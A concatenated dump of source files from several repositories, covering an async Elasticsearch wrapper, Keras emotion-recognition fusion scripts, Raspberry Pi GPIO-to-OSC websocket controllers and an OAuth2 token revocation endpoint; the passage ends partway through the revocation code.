df_list.append(df.copy())
df_plot = pd.concat(df_list, axis=0)
# df_plot.to_csv('graphs/data/LP/lp_{}.csv'.format(ds))
print('Total {}'.format(len(df_plot)))
# df_plot.mrr = df_plot.mrr * 500
# df2.to_csv('beta_plot.csv')
plot_graph(df_plot, metric, plot_name, figsize, legend)
``` |
{
"source": "3lLobo/WolfDapp",
"score": 2
} |
#### File: tests/unit/test_stupido.py
```python
def test_stpdo():
"""Non-sense test.
"""
assert 1 + 10 == 11
``` |
{
"source": "3lnc/elasticsearch-adsl",
"score": 2
} |
#### File: elasticsearch-adsl/elasticsearch_adsl/connections.py
```python
from elasticsearch_async import AsyncElasticsearch
from elasticsearch_dsl import connections as sync
from elasticsearch_dsl.serializer import serializer
class _Connections(sync.Connections):
def __init__(self):
super().__init__()
self._kwargs = sync.connections._kwargs
self._conns = sync.connections._conns
def create_connection(self, alias='async', client_class=AsyncElasticsearch, **kwargs):
"""
Construct an instance of ``client_class`` and register
it under given alias.
"""
kwargs.setdefault('serializer', serializer)
conn = self._conns[alias] = client_class(**kwargs)
return conn
def get_connection(self, alias='async'):
return super().get_connection(alias)
get_connection.__doc__ = sync.Connections.get_connection.__doc__
_connections = _Connections()
configure = _connections.configure
add_connection = _connections.add_connection
remove_connection = _connections.remove_connection
create_connection = _connections.create_connection
get_connection = _connections.get_connection
```
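A brief usage sketch of the registry above (added for illustration; the host and alias values are assumptions, not part of the source):
```python
from elasticsearch_adsl.connections import create_connection, get_connection

# Register an AsyncElasticsearch client under the default 'async' alias.
create_connection(hosts=['localhost:9200'])  # hypothetical host

# Any later call retrieves the same client instance by alias.
client = get_connection()
assert client is get_connection('async')
```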
#### File: elasticsearch-adsl/tests/test_search.py
```python
from elasticsearch_dsl.response import Hit, Response
from pytest import fixture, raises
from elasticsearch_adsl.search import Search
from elasticsearch_dsl.query import MatchAll
@fixture(autouse=True)
async def _test_data(aes, index_name, test_data):
return
async def test_count(index_name):
search = Search(index=index_name)
assert await search.count() == 3
async def test_count_query(index_name):
search = Search(index=index_name).query('range', value={'gt': 1})
assert await search.count() == 2
async def test_count_prefetch(aes, mocker): # FIXME: use high-level interface
mocker.spy(aes, 'count')
search = Search()
await search.execute()
assert await search.count() == 3
assert aes.count.call_count == 0
async def test_execute(index_name):
result = await Search(index=index_name).execute()
assert isinstance(result, Response)
assert len(result.hits) == 3
async def test_execute_query(index_name):
result = await Search(index=index_name).query('term', value=1).execute()
assert result.hits[0] is result[0]
hit = result[0]
assert isinstance(hit, Hit)
assert hit.value == 1
async def test_execute_cache(aes, index_name, mocker):
mocker.spy(aes, 'search')
search = Search(index=index_name)
result1 = await search.execute()
result2 = await search.execute()
assert result1.hits == result2.hits
assert aes.search.call_count == 1
result3 = await search.execute(ignore_cache=True)
assert result3.hits == result1.hits
assert aes.search.call_count == 2
async def test_delete(index_name):
assert await Search(index=index_name).count() == 3
await Search(index=index_name).query('term', value=1).params(refresh=True).delete()
assert await Search(index=index_name).count() == 2
await Search(index=index_name).query(MatchAll()).params(refresh=True).delete()
assert await Search(index=index_name).count() == 0
async def test_scan(index_name):
result = [h async for h in Search(index=index_name).scan()]
assert len(result) == 3
assert isinstance(result[0], Hit)
assert {h.value for h in result} == {1, 2, 3}
async def test_aiter(index_name):
result = [d async for d in Search(index=index_name)[:1]]
assert len(result) == 1
assert isinstance(result[0], Hit)
result = [d async for d in Search(index=index_name)]
assert len(result) == 3
assert isinstance(result[0], Hit)
assert {h.value for h in result} == {1, 2, 3}
def test_iter(index_name):
with raises(TypeError) as e:
iter(Search(index=index_name))
assert 'use asynchronous iteration instead' in str(e.value)
``` |
{
"source": "3lnc/go.py",
"score": 4
} |
#### File: 3lnc/go.py/Vector2D.py
```python
from math import hypot
class Vector2d(object):
def __init__(self, x, y):
self._x = x
self._y = y
def __repr__(self):
return "Vector2d({}, {})".format(self._x, self._y)
def __add__(self, other):
if not isinstance(other, Vector2d):
return NotImplemented
return Vector2d(self._x + other._x, self._y + other._y)
def __eq__(self, other):
if not isinstance(other, Vector2d):
return NotImplemented
return self._x == other._x and self._y == other._y
def __neg__(self):
return Vector2d(-self._x, -self._y)
def __mul__(self, other):
if not isinstance(other, (int, float)):
return NotImplemented
return Vector2d(self._x * other, self._y * other)
def __rmul__(self, other):
return self * other
def __abs__(self):
return hypot(self._x, self._y)
@property
def x(self):
return self._x
@property
def y(self):
return self._y
``` |
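A short usage sketch of the class above (added for illustration):
```python
from Vector2D import Vector2d

v, w = Vector2d(3, 4), Vector2d(1, 2)
print(v + w)   # Vector2d(4, 6)
print(2 * v)   # Vector2d(6, 8), via __rmul__
print(abs(v))  # 5.0, the Euclidean norm from math.hypot
assert -w == Vector2d(-1, -2)
```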
{
"source": "3lnc/pytest",
"score": 2
} |
#### File: test_conftest_funcargs_only_available_in_subdir/sub2/conftest.py
```python
import pytest
@pytest.fixture
def arg2(request):
pytest.raises(Exception, "request.getfixturevalue('arg1')")
``` |
{
"source": "3loi/MSP_Face",
"score": 2
} |
#### File: MSP_Face/AudioVisual_Modality/fusion_model_test.py
```python
import numpy as np
from keras.models import Model
from keras.layers import Dense, Input
from keras.optimizers import Adam
from scipy.io import loadmat
from sklearn.metrics import f1_score
from utils import getPaths, cc_coef, evaluation_metrics
from utils import softprob2class_5class, softprob2class_8class
import argparse
def fusion_network_MTL(num_nodes):
inputs = Input((768,))
encode = Dense(num_nodes, activation='relu')(inputs)
encode = Dense(num_nodes, activation='relu')(encode)
output_act = Dense(units=1, activation='linear')(encode)
output_dom = Dense(units=1, activation='linear')(encode)
output_val = Dense(units=1, activation='linear')(encode)
adam = Adam(lr=0.0001)
model = Model(inputs=inputs, outputs=[output_act, output_dom, output_val])
model.compile(optimizer=adam, loss=[cc_coef, cc_coef, cc_coef])
return model
def fusion_network_class(num_nodes, num_class):
inputs = Input((768,))
encode = Dense(num_nodes, activation='relu')(inputs)
encode = Dense(num_nodes, activation='relu')(encode)
outputs = Dense(units=num_class, activation='softmax')(encode)
adam = Adam(lr=0.0001)
model = Model(inputs=inputs, outputs=outputs)
model.compile(optimizer=adam, loss='categorical_crossentropy')
return model
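# --- Added sketch: cc_coef above is imported from the project's utils module.
# For context, a concordance-correlation loss (1 - CCC) commonly looks like the
# following; this is an illustrative assumption, not the project's definition.
def _cc_coef_sketch(y_true, y_pred):
    from keras import backend as K
    mu_t, mu_p = K.mean(y_true), K.mean(y_pred)
    var_t, var_p = K.var(y_true), K.var(y_pred)
    cov = K.mean((y_true - mu_t) * (y_pred - mu_p))
    ccc = 2 * cov / (var_t + var_p + K.square(mu_t - mu_p) + K.epsilon())
    return 1 - ccc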
###############################################################################
argparse = argparse.ArgumentParser()
argparse.add_argument("-ep", "--epoch", required=True)
argparse.add_argument("-batch", "--batch_size", required=True)
argparse.add_argument("-emo", "--emo_type", required=True)
argparse.add_argument("-nodes", "--num_nodes", required=True)
argparse.add_argument("-nc", "--num_class")
args = vars(argparse.parse_args())
# Parameters
batch_size = int(args['batch_size'])
epochs = int(args['epoch'])
num_nodes = int(args['num_nodes'])
label_type = args['emo_type']
try:
num_class = args['num_class']
except:
pass
# Hidden Features Paths Setting
if label_type == 'attr':
root_dir = './Fusion_Features/3-attribute'
elif label_type == 'class':
if num_class == '5-class':
root_dir = './Fusion_Features/5-class'
elif num_class == '8-class':
root_dir = './Fusion_Features/8-class'
# Loading Paths & Labels
if label_type == 'class':
paths_test, labels_class_test = getPaths(label_type, split_set='Test', num_class=num_class)
elif label_type == 'attr':
# Loading Norm-Label
Label_mean_act = loadmat('./NormTerm/act_norm_means.mat')['normal_para'][0][0]
Label_std_act = loadmat('./NormTerm/act_norm_stds.mat')['normal_para'][0][0]
Label_mean_dom = loadmat('./NormTerm/dom_norm_means.mat')['normal_para'][0][0]
Label_std_dom = loadmat('./NormTerm/dom_norm_stds.mat')['normal_para'][0][0]
Label_mean_val = loadmat('./NormTerm/val_norm_means.mat')['normal_para'][0][0]
Label_std_val = loadmat('./NormTerm/val_norm_stds.mat')['normal_para'][0][0]
paths_test, labels_act_test, labels_dom_test, labels_val_test = getPaths(label_type, split_set='Test', num_class=num_class)
# Loading Hidden Features (Testing set)
X_Test = []
Y_Test_Class = []
Y_Test_Act = []
Y_Test_Dom = []
Y_Test_Val = []
for i in range(len(paths_test)):
try: # deal with missing files
x_audio = loadmat(root_dir + '/Audios/' + paths_test[i].replace('.wav','.mat'))['Feat']
x_video = loadmat(root_dir + '/Videos/' + paths_test[i].replace('.wav','.mat'))['Feat']
# fusing audio-visual hidden features
x = np.concatenate((x_audio, x_video),axis=1)
x = x.reshape(-1)
X_Test.append(x)
if label_type == 'class':
y = labels_class_test[i]
Y_Test_Class.append(y)
elif label_type == 'attr':
y_act = labels_act_test[i]
y_dom = labels_dom_test[i]
y_val = labels_val_test[i]
Y_Test_Act.append(y_act)
Y_Test_Dom.append(y_dom)
Y_Test_Val.append(y_val)
except:
pass
if label_type == 'class':
X_Test = np.array(X_Test)
Y_Test_Class = np.array(Y_Test_Class)
elif label_type == 'attr':
X_Test = np.array(X_Test)
Y_Test_Act = np.array(Y_Test_Act)
Y_Test_Dom = np.array(Y_Test_Dom)
Y_Test_Val = np.array(Y_Test_Val)
# Loading Models
if label_type == 'attr':
filepath='./Fusion_Models/DenseNN_model[epoch'+str(epochs)+'-batch'+str(batch_size)+'-nodes'+str(num_nodes)+']_'+label_type+'.hdf5'
elif label_type == 'class':
filepath='./Fusion_Models/DenseNN_model[epoch'+str(epochs)+'-batch'+str(batch_size)+'-nodes'+str(num_nodes)+']_'+num_class+'.hdf5'
# Testing process
if label_type == 'class':
best_model = fusion_network_class(num_nodes=num_nodes, num_class=int(num_class.split('-')[0]))
best_model.load_weights(filepath)
pred_class_prob = best_model.predict(X_Test)
# class prob => class label
pred_class = []
for i in range(len(pred_class_prob)):
if num_class == '5-class':
pred_class.append(softprob2class_5class(pred_class_prob[i,:]))
elif num_class == '8-class':
pred_class.append(softprob2class_8class(pred_class_prob[i,:]))
pred_class = np.array(pred_class)
# compute evaluation metrics
fs_test_uar = f1_score(Y_Test_Class, pred_class, average='macro')
fs_test_total = f1_score(Y_Test_Class, pred_class, average='micro')
print('Test F1-Score(UAR): '+str(fs_test_uar))
print('Test F1-Score(Total): '+str(fs_test_total))
elif label_type == 'attr':
best_model = fusion_network_MTL(num_nodes=num_nodes)
best_model.load_weights(filepath)
pred_act, pred_dom, pred_val = best_model.predict(X_Test)
# de-normalization
pred_act = (Label_std_act*pred_act)+Label_mean_act
pred_dom = (Label_std_dom*pred_dom)+Label_mean_dom
pred_val = (Label_std_val*pred_val)+Label_mean_val
# Output Predict Reulst
pred_Rsl_Act = str(evaluation_metrics(Y_Test_Act, pred_act)[0])
pred_Rsl_Dom = str(evaluation_metrics(Y_Test_Dom, pred_dom)[0])
pred_Rsl_Val = str(evaluation_metrics(Y_Test_Val, pred_val)[0])
print('Act-CCC: '+str(pred_Rsl_Act))
print('Dom-CCC: '+str(pred_Rsl_Dom))
print('Val-CCC: '+str(pred_Rsl_Val))
```
#### File: MSP_Face/AudioVisual_Modality/fusion_model_train.py
```python
import os
import numpy as np
import matplotlib.pyplot as plt
from keras.models import Model
from keras.layers import Dense, Input
from keras.callbacks import ModelCheckpoint
from keras.optimizers import Adam
from scipy.io import loadmat
from utils import getPaths, cc_coef
from utils import class2onehot_5class, class2onehot_8class
import argparse
def fusion_network_MTL(num_nodes):
inputs = Input((768,))
encode = Dense(num_nodes, activation='relu')(inputs)
encode = Dense(num_nodes, activation='relu')(encode)
output_act = Dense(units=1, activation='linear')(encode)
output_dom = Dense(units=1, activation='linear')(encode)
output_val = Dense(units=1, activation='linear')(encode)
adam = Adam(lr=0.0001)
model = Model(inputs=inputs, outputs=[output_act, output_dom, output_val])
model.compile(optimizer=adam, loss=[cc_coef, cc_coef, cc_coef])
return model
def fusion_network_class(num_nodes, num_class):
inputs = Input((768,))
encode = Dense(num_nodes, activation='relu')(inputs)
encode = Dense(num_nodes, activation='relu')(encode)
outputs = Dense(units=num_class, activation='softmax')(encode)
adam = Adam(lr=0.0001)
model = Model(inputs=inputs, outputs=outputs)
model.compile(optimizer=adam, loss='categorical_crossentropy')
return model
###############################################################################
argparse = argparse.ArgumentParser()
argparse.add_argument("-ep", "--epoch", required=True)
argparse.add_argument("-batch", "--batch_size", required=True)
argparse.add_argument("-emo", "--emo_type", required=True)
argparse.add_argument("-nodes", "--num_nodes", required=True)
argparse.add_argument("-nc", "--num_class")
args = vars(argparse.parse_args())
# Parameters
shuffle = True
random_seed = 99
batch_size = int(args['batch_size'])
epochs = int(args['epoch'])
num_nodes = int(args['num_nodes'])
label_type = args['emo_type']
try:
num_class = args['num_class']
except:
pass
# Hidden Features Paths Setting
if label_type == 'attr':
root_dir = './Fusion_Features/3-attribute'
elif label_type == 'class':
if num_class == '5-class':
root_dir = './Fusion_Features/5-class'
elif num_class == '8-class':
root_dir = './Fusion_Features/8-class'
# Loading Paths & Labels
if label_type == 'class':
paths_valid, labels_class_valid = getPaths(label_type, split_set='Validation', num_class=num_class)
paths_train, labels_class_train = getPaths(label_type, split_set='Train', num_class=num_class)
elif label_type == 'attr':
# Loading Norm-Label
Label_mean_act = loadmat('./NormTerm/act_norm_means.mat')['normal_para'][0][0]
Label_std_act = loadmat('./NormTerm/act_norm_stds.mat')['normal_para'][0][0]
Label_mean_dom = loadmat('./NormTerm/dom_norm_means.mat')['normal_para'][0][0]
Label_std_dom = loadmat('./NormTerm/dom_norm_stds.mat')['normal_para'][0][0]
Label_mean_val = loadmat('./NormTerm/val_norm_means.mat')['normal_para'][0][0]
Label_std_val = loadmat('./NormTerm/val_norm_stds.mat')['normal_para'][0][0]
paths_valid, labels_act_valid, labels_dom_valid, labels_val_valid = getPaths(label_type, split_set='Validation', num_class=num_class)
paths_train, labels_act_train, labels_dom_train, labels_val_train = getPaths(label_type, split_set='Train', num_class=num_class)
# shuffle the training set
indexes = np.arange(len(paths_train))
if shuffle:
np.random.seed(random_seed)
np.random.shuffle(indexes)
if label_type == 'class':
shuffle_paths_train = [paths_train[k] for k in indexes]
shuffle_class_train = [labels_class_train[k] for k in indexes]
elif label_type == 'attr':
shuffle_paths_train = [paths_train[k] for k in indexes]
shuffle_act_train = [labels_act_train[k] for k in indexes]
shuffle_dom_train = [labels_dom_train[k] for k in indexes]
shuffle_val_train = [labels_val_train[k] for k in indexes]
# Loading Hidden Features (Training set)
X_Train = []
Y_Train_Class = []
Y_Train_Act = []
Y_Train_Dom = []
Y_Train_Val = []
for i in range(len(shuffle_paths_train)):
try: # deal with missing files
x_audio = loadmat(root_dir + '/Audios/' + shuffle_paths_train[i].replace('.wav','.mat'))['Feat']
x_video = loadmat(root_dir + '/Videos/' + shuffle_paths_train[i].replace('.wav','.mat'))['Feat']
# fusing audio-visual hidden features
x = np.concatenate((x_audio, x_video),axis=1)
x = x.reshape(-1)
X_Train.append(x)
if label_type == 'class': # STL
# class to one-hot label
if num_class == '5-class':
y = class2onehot_5class(shuffle_class_train[i])
elif num_class == '8-class':
y = class2onehot_8class(shuffle_class_train[i])
Y_Train_Class.append(y)
elif label_type == 'attr': # MTL
# normalize regression label
y_act = (shuffle_act_train[i]-Label_mean_act)/Label_std_act
y_dom = (shuffle_dom_train[i]-Label_mean_dom)/Label_std_dom
y_val = (shuffle_val_train[i]-Label_mean_val)/Label_std_val
Y_Train_Act.append(y_act)
Y_Train_Dom.append(y_dom)
Y_Train_Val.append(y_val)
except:
pass
if label_type == 'class':
X_Train = np.array(X_Train)
Y_Train_Class = np.array(Y_Train_Class)
elif label_type == 'attr':
X_Train = np.array(X_Train)
Y_Train_Act = np.array(Y_Train_Act)
Y_Train_Dom = np.array(Y_Train_Dom)
Y_Train_Val = np.array(Y_Train_Val)
# Loading Hidden Features (Validation set)
X_Valid = []
Y_Valid_Class = []
Y_Valid_Act = []
Y_Valid_Dom = []
Y_Valid_Val = []
for i in range(len(paths_valid)):
try: # deal with missing files
x_audio = loadmat(root_dir + '/Audios/' + paths_valid[i].replace('.wav','.mat'))['Feat']
x_video = loadmat(root_dir + '/Videos/' + paths_valid[i].replace('.wav','.mat'))['Feat']
# fusing audio-visual hidden features
x = np.concatenate((x_audio, x_video),axis=1)
x = x.reshape(-1)
X_Valid.append(x)
if label_type == 'class':
# class to one-hot label
if num_class == '5-class':
y = class2onehot_5class(labels_class_valid[i])
elif num_class == '8-class':
y = class2onehot_8class(labels_class_valid[i])
Y_Valid_Class.append(y)
elif label_type == 'attr':
y_act = (labels_act_valid[i]-Label_mean_act)/Label_std_act
y_dom = (labels_dom_valid[i]-Label_mean_dom)/Label_std_dom
y_val = (labels_val_valid[i]-Label_mean_val)/Label_std_val
Y_Valid_Act.append(y_act)
Y_Valid_Dom.append(y_dom)
Y_Valid_Val.append(y_val)
except:
pass
if label_type == 'class':
X_Valid = np.array(X_Valid)
Y_Valid_Class = np.array(Y_Valid_Class)
elif label_type == 'attr':
X_Valid = np.array(X_Valid)
Y_Valid_Act = np.array(Y_Valid_Act)
Y_Valid_Dom = np.array(Y_Valid_Dom)
Y_Valid_Val = np.array(Y_Valid_Val)
# loading model structure
if label_type == 'class':
model = fusion_network_class(num_nodes=num_nodes, num_class=int(num_class.split('-')[0]))
elif label_type == 'attr':
model = fusion_network_MTL(num_nodes=num_nodes)
#print(model.summary())
# Output fusion models saving folder
if not os.path.isdir('./Fusion_Models/'):
os.makedirs('./Fusion_Models/')
# setting model checkpoints
if label_type == 'attr':
filepath='./Fusion_Models/DenseNN_model[epoch'+str(epochs)+'-batch'+str(batch_size)+'-nodes'+str(num_nodes)+']_'+label_type+'.hdf5'
elif label_type == 'class':
filepath='./Fusion_Models/DenseNN_model[epoch'+str(epochs)+'-batch'+str(batch_size)+'-nodes'+str(num_nodes)+']_'+num_class+'.hdf5'
checkpoint = ModelCheckpoint(filepath, monitor='val_loss', verbose=1, save_best_only=True, mode='min')
callbacks_list = [checkpoint]
# model fitting
if label_type == 'class':
model.fit(x=X_Train,
y=Y_Train_Class,
batch_size=batch_size,
epochs=epochs,
validation_data=(X_Valid, Y_Valid_Class),
verbose=1,
callbacks=callbacks_list)
elif label_type == 'attr':
model.fit(x=X_Train,
y=([Y_Train_Act, Y_Train_Dom, Y_Train_Val]),
batch_size=batch_size,
epochs=epochs,
validation_data=(X_Valid, [Y_Valid_Act, Y_Valid_Dom, Y_Valid_Val]),
verbose=1,
callbacks=callbacks_list)
# Show training & validation loss
v_loss = model.history.history['val_loss']
t_loss = model.history.history['loss']
plt.plot(t_loss,'b')
plt.plot(v_loss,'r')
if label_type == 'attr':
plt.savefig('./Fusion_Models/DenseNN_model[epoch'+str(epochs)+'-batch'+str(batch_size)+'-nodes'+str(num_nodes)+']_'+label_type+'.png')
elif label_type == 'class':
plt.savefig('./Fusion_Models/DenseNN_model[epoch'+str(epochs)+'-batch'+str(batch_size)+'-nodes'+str(num_nodes)+']_'+num_class+'.png')
``` |
{
"source": "3lorsin/GPIO-OSC",
"score": 3
} |
#### File: src/html/WS-OSC.py
```python
import asyncio
#import datetime
#import random
import websockets
import argparse
import time
import json
from pythonosc import udp_client
#from configparser import ConfigParser, ExtendedInterpolation
from pymemcache.client.base import Client
GPIOState = Client(('localhost', 11211))
##########
# Config #
##########
with open('/var/www/html/config.json') as config_file:
config = json.load(config_file)
##########
# Config #
##########
#Pause so the GPIO-OSC.py has time to build the memcache
time.sleep(15)
###############
# Send Output #
###############
def send_OSC(json_raw):
data = json.loads(json_raw)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--ip", default=data["ip"],
help="The ip of the OSC server")
parser.add_argument("--port", type=int, default=data["port"],
help="The port the OSC server is listening on")
args = parser.parse_args()
client = udp_client.SimpleUDPClient(args.ip, args.port)
client.send_message(data["command"], data["value"])
    print('OSC Command Received: ' + json_raw)
def button_pressed(GPIO, state):
    button_commands = config['GPIO'][GPIO]["commands"]
# Run each command
for x in button_commands:
if (x != ""):
current_command = config['commands'][x]["command"]
device = config['commands'][x]["device"]
current_value = config['commands'][x][state]
current_ip = config['osc_devices'][device]["ip"]
current_port = config['osc_devices'][device]["port"]
# if command state is null, do not run
if (current_value != "null"):
send_OSC('{ "command":"'+ current_command + '" , "value":'+ current_value+', "ip":"'+current_ip+'", "port":"'+current_port+'" }')
print("Command Executed" + x)
###############
# Send Output #
###############
#############
# WEBSOCKET #
#############
async def hello(websocket, path):
ws_command = await websocket.recv()
await websocket.send("Config Here")
print(ws_command)
print("fired")
#######################################
# message handling #
# type: (button press, configure) #
# data: (JSON DATA) #
#######################################
    ws_json = json.loads(ws_command)
    response = "Unknown message type"  # default so send(response) below is always defined
if (ws_json['type'] == "sendConfig"):
print('Config')
response = "config sending"
if (ws_json['type'] == 'button_press'):
button_number = ws_json['data'][0]['button']
button_state = ws_json['data'][0]['state']
button_pressed(button_number, button_state)
response = "Command Sent: "+ws_command
#handle configuration edits here
if (ws_json['type'] == 'configure'):
        update_config(ws_json['data'][0]['section'], ws_json['data'][0]['option'], ws_json['data'][0]['value'])  # update_config() is assumed to be defined elsewhere in the project
print("Configuration Edited")
response = "Config Edited"
await websocket.send(response)
    await asyncio.sleep(0)  # sleep() requires a delay argument; 0 just yields control to the event loop
print("Starting WS...")
start_websocket_server = websockets.serve(hello, "192.168.1.101", 5678)
#############
# WEBSOCKET #
#############
asyncio.get_event_loop().run_until_complete(start_websocket_server)
asyncio.get_event_loop().run_forever()
```
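The hello() handler above dispatches on a `type` field and a `data` array. A hedged sketch of a client driving it (server address from the `websockets.serve` call above; the button name and state are hypothetical):
```python
# Hedged sketch of a client for the hello() handler above; the message
# field names come from the parsing code, the values are placeholders.
import asyncio
import json
import websockets

async def demo():
    async with websockets.connect("ws://192.168.1.101:5678") as ws:
        await ws.send(json.dumps({
            "type": "button_press",
            "data": [{"button": "button_1", "state": "on"}],
        }))
        print(await ws.recv())  # handler replies "Config Here" first
        print(await ws.recv())  # then the "Command Sent: ..." response

asyncio.get_event_loop().run_until_complete(demo())
```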
#### File: GPIO-OSC/will_testing/GPIO-OSC-WS.py
```python
import asyncio
import datetime
import random
import websockets
import argparse
import time
import json
import RPi.GPIO as GPIO
from pythonosc import udp_client
from configparser import ConfigParser, ExtendedInterpolation
##########
# Config #
##########
with open('config.json') as config_file:
config = json.load(config_file)
#print(config['button_1']['commands'])
##########
# Config #
##########
###############
# Send Output #
###############
def send_OSC(json_raw):
data = json.loads(json_raw)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--ip", default=data["ip"],
help="The ip of the OSC server")
parser.add_argument("--port", type=int, default=data["port"],
help="The port the OSC server is listening on")
args = parser.parse_args()
client = udp_client.SimpleUDPClient(args.ip, args.port)
client.send_message(data["command"], data["value"])
print('OSC Command Received: '+ json_raw);
def button_pressed(button_number, button_state):
button_commands = config['buttons'][button_number]["commands"]
# Run each command
for x in button_commands:
current_command = config['commands'][x]["command"]
current_value = config['commands'][x][button_state]
current_ip = config['commands'][x]["ip"]
current_port = config['commands'][x]["port"]
# if command state is null, do not run
if (current_value != "null"):
send_OSC('{ "command":"'+ current_command + '" , "value":'+ current_value+', "ip":"'+current_ip+'", "port":"'+current_port+'" }')
print("Command Executed" + x)
###############
# Send Output #
###############
########
# GPIO #
########
GPIO.setmode(GPIO.BOARD)
GPIO.setup(16,GPIO.IN)
GPIO.setup(15,GPIO.IN)
GPIO.setup(18,GPIO.IN)
B1_state = 0
B2_state = 0
B3_state = 0
async def buttons():
    # B*_state live at module level; declare them global so the assignments
    # below update the shared state instead of raising UnboundLocalError.
    global B1_state, B2_state, B3_state
    try:
        while True:
            if GPIO.input(16) == 1 and B1_state == 0:
                print("Button_1 On")
                button_pressed("button_1", "on")
                B1_state = 1
                await asyncio.sleep(.1)  # non-blocking debounce; time.sleep() would stall the event loop
            if GPIO.input(16) == 0 and B1_state == 1:
                print("Button_1 Off")
                button_pressed("button_1", "off")
                B1_state = 0
                await asyncio.sleep(.1)
            if GPIO.input(15) == 1 and B2_state == 0:
                print("Button_2 On")
                button_pressed("button_2", "on")
                B2_state = 1
                await asyncio.sleep(.1)
            if GPIO.input(15) == 0 and B2_state == 1:
                print("Button_2 Off")
                button_pressed("button_2", "off")
                B2_state = 0
                await asyncio.sleep(.1)
            if GPIO.input(18) == 1 and B3_state == 0:
                print("Button_3 On")
                button_pressed("button_3", "on")
                B3_state = 1
                await asyncio.sleep(.1)
            if GPIO.input(18) == 0 and B3_state == 1:
                print("Button_3 Off")
                button_pressed("button_3", "off")
                B3_state = 0
                await asyncio.sleep(.1)
    finally:
        # cleanup the GPIO pins before ending
        GPIO.cleanup()
########
# GPIO #
########
#############
# WEBSOCKET #
#############
async def hello(websocket, path):
ws_command = await websocket.recv()
await websocket.send("Config Here")
print(ws_command)
print("fired")
#######################################
# message handling #
# type: (button press, configure). #
# data: (JSON DATA) #
#######################################
    ws_json = json.loads(ws_command)
    response = "Unknown message type"  # default so send(response) below is always defined
if (ws_json['type'] == "sendConfig"):
print('Config')
response = "config sending"
if (ws_json['type'] == 'button_press'):
button_number = ws_json['data'][0]['button']
button_state = ws_json['data'][0]['state']
button_pressed(button_number, button_state)
response = "Command Sent: "+ws_command
#handle configuration edits here
if (ws_json['type'] == 'configure'):
        update_config(ws_json['data'][0]['section'], ws_json['data'][0]['option'], ws_json['data'][0]['value'])  # update_config() is assumed to be defined elsewhere in the project
print("Configuration Edited")
response = "Config Edited"
await websocket.send(response)
    await asyncio.sleep(0)  # sleep() requires a delay argument; 0 just yields control to the event loop
start_websocket_server = websockets.serve(hello, "192.168.2.2", 5678)
#############
# WEBSOCKET #
#############
loop = asyncio.get_event_loop()
loop.run_until_complete(start_websocket_server)
# Schedule the GPIO polling coroutine on the same loop. The original trailing
# `asyncio.run_until_complete(buttons)` was unreachable after run_forever()
# and is not a real asyncio function.
loop.create_task(buttons())
loop.run_forever()
``` |
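Both scripts drive everything from config.json, whose shape can be inferred from the dictionary lookups above. A hedged sketch of a minimal config for GPIO-OSC-WS.py (key names from the code, values hypothetical; WS-OSC.py additionally resolves ip/port through a top-level `osc_devices` map keyed by each command's `device` field):
```python
# Hypothetical minimal config.json for GPIO-OSC-WS.py, inferred from the
# lookups config['buttons'][...]['commands'] and config['commands'][...].
example_config = {
    "buttons": {
        "button_1": {"commands": ["light_toggle"]},
    },
    "commands": {
        "light_toggle": {
            "command": "/light/1",   # OSC address to send
            "on": "1.0",             # value sent on press ("null" disables)
            "off": "0.0",            # value sent on release
            "ip": "192.168.2.50",    # OSC device address
            "port": "8000",
        },
    },
}
```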
{
"source": "3lpsy/authlib",
"score": 3
} |
#### File: oauth2/rfc7009/revocation.py
```python
from ..rfc6749 import TokenEndpoint
from ..rfc6749 import (
OAuth2Error, InvalidRequestError, UnsupportedTokenTypeError
)
class RevocationEndpoint(TokenEndpoint):
"""Implementation of revocation endpoint which is described in
`RFC7009`_.
.. _RFC7009: https://tools.ietf.org/html/rfc7009
"""
#: Endpoint name to be registered
ENDPOINT_NAME = 'revocation'
def validate_endpoint_request(self):
"""The client constructs the request by including the following
parameters using the "application/x-www-form-urlencoded" format in
the HTTP request entity-body:
token
REQUIRED. The token that the client wants to get revoked.
token_type_hint
OPTIONAL. A hint about the type of the token submitted for
revocation.
"""
if self.request.body_params:
params = dict(self.request.body_params)
else:
params = dict(self.request.query_params)
if 'token' not in params:
raise InvalidRequestError()
token_type = params.get('token_type_hint')
if token_type and token_type not in self.SUPPORTED_TOKEN_TYPES:
raise UnsupportedTokenTypeError()
token = self.query_token(
params['token'], token_type, self.request.client)
if not token:
raise InvalidRequestError()
self.request.credential = token
def create_endpoint_response(self):
"""Validate revocation request and create the response for revocation.
For example, a client may request the revocation of a refresh token
with the following request::
POST /revoke HTTP/1.1
Host: server.example.com
Content-Type: application/x-www-form-urlencoded
Authorization: Basic czZCaGRSa3F0MzpnWDFmQmF0M2JW
token=45ghiukldjahdnhzdauz&token_type_hint=refresh_token
:returns: (status_code, body, headers)
"""
try:
# The authorization server first validates the client credentials
self.authenticate_endpoint_client()
# then verifies whether the token was issued to the client making
# the revocation request
self.validate_endpoint_request()
# the authorization server invalidates the token
self.revoke_token(self.request.credential)
self.server.send_signal(
'after_revoke_token',
token=self.request.credential,
client=self.request.client,
)
status = 200
body = {}
headers = [
('Content-Type', 'application/json'),
('Cache-Control', 'no-store'),
('Pragma', 'no-cache'),
]
except OAuth2Error as error:
status = error.status_code
body = dict(error.get_body())
headers = error.get_headers()
return status, body, headers
def query_token(self, token, token_type_hint, client):
"""Get the token from database/storage by the given token string.
Developers should implement this method::
def query_token(self, token, token_type_hint, client):
if token_type_hint == 'access_token':
return Token.query_by_access_token(token, client.client_id)
if token_type_hint == 'refresh_token':
return Token.query_by_refresh_token(token, client.client_id)
return Token.query_by_access_token(token, client.client_id) or \
Token.query_by_refresh_token(token, client.client_id)
"""
raise NotImplementedError()
def revoke_token(self, token):
"""Mark token as revoked. Since token MUST be unique, it would be
dangerous to delete it. Consider this situation:
1. Jane obtained a token XYZ
2. Jane revoked (deleted) token XYZ
3. Bob generated a new token XYZ
4. Jane can use XYZ to access Bob's resource
It would be secure to mark a token as revoked::
def revoke_token(self, token):
token.revoked = True
session.add(token)
session.commit()
"""
raise NotImplementedError()
```
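For context, a concrete server subclasses this endpoint, fills in the two storage hooks, and registers it, exactly as the docstrings above suggest. A minimal sketch, assuming a SQLAlchemy-style `Token` model and `session` (both hypothetical); the `register_endpoint` call mirrors the Flask test further below:
```python
# Hedged sketch: Token and session are hypothetical storage primitives;
# the registration call matches authlib's server.register_endpoint usage.
class MyRevocationEndpoint(RevocationEndpoint):
    def query_token(self, token, token_type_hint, client):
        if token_type_hint == 'access_token':
            return Token.query_by_access_token(token, client.client_id)
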